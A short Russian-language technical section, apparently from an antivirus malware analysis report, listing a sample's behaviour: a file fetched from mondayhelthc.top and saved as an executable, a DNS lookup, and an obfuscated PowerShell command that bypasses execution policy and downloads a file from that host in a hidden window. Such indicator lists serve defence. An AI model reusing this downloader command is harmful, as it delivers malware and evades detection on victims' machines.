Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^owE^r^She^L^L^.e^XE -e^X^Ec^ut^IonpOLiCy^ B^YPA^sS -^No^p^ROf^I^L^E -^wI^N^dO^ws^tYle ^hiD^d^E^n (^new-obJeC^T ^SYs^tEM^.nET.^WEbCLi^eNT).^dO^wnL^oaDFilE('http://mondayhelthc...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "P^owE^r^She^L^L^.e^XE -e^X^Ec^ut^IonpOLiCy^ B^YPA^sS -^No^p^ROf^I^L^E -^wI^N^dO^ws^tYle ^hiD^d^E^n (^new-obJeC^T ^SYs^tEM^.nET.^WEbCLi^eNT).^dO^wnL^oaDFilE('http://mondayhelthc...' (со скрытым окном)